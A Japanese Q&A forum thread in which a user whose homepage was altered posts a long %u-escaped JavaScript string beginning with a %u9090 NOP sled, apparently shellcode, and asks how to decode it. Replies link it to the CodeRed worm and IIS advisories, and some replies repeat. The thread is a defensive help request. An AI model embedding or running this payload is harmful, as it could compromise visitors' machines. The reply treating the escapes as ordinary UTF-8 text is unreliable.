以下のURLを参考にして追加されたコード(Javascript)を調べたのですが、何が書いてあるのか読めませんでした。
http://www.geocities.jp/masaki030914/masaki/javascript/escape_unescape.html
一部を掲載しますので、解析方法教えていただきたいです。よろしくお願いします。
%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10
> %u9090%u9090......
これって、ワームじゃないでしょうか。
・CERT Advisory CA-2001-19 (和訳)
http://www.reasoning.org/jp/cert/cert2001-19.html
・Index Server ISAPI エクステンションの未チェックのバッファにより Web サーバーが攻撃される問題について
http://www.ipa.go.jp/security/ciadr/vul/200106iisidxsvr.htm
> HPの書き換えにあった
ってことは、感染しているかもしれませんね。
http://neko.dosanko.ch/contents/script/tool/convert/index
結論をいうと、日本語でないので読めません。
%u9090
というのはutf-8の文字列で
邐
と等価です。
故に
邐邐࿫...
と置換し、
<html>
<head>
<meta http-equiv="content" content="text/html; charset=UTF-8">
</head>
<body>
邐邐࿫...
</body>
</html>
と簡易に作成したhtmlをIEに放り込んでも、よめない文字がでてくる
だけです。
やっぱり読めないですか…ご協力をいただきありがとうございました。
> %u9090%u9090......
これって、ワームじゃないでしょうか。
・CERT Advisory CA-2001-19 (和訳)
http://www.reasoning.org/jp/cert/cert2001-19.html
・Index Server ISAPI エクステンションの未チェックのバッファにより Web サーバーが攻撃される問題について
http://www.ipa.go.jp/security/ciadr/vul/200106iisidxsvr.htm
> HPの書き換えにあった
ってことは、感染しているかもしれませんね。
%u9090%u9090......
で調べた時に、CodeRedのページが引っかかっていたので、そうかもしれません。
ご協力をいただきありがとうございました。
%u9090%u9090......
で調べた時に、CodeRedのページが引っかかっていたので、そうかもしれません。
ご協力をいただきありがとうございました。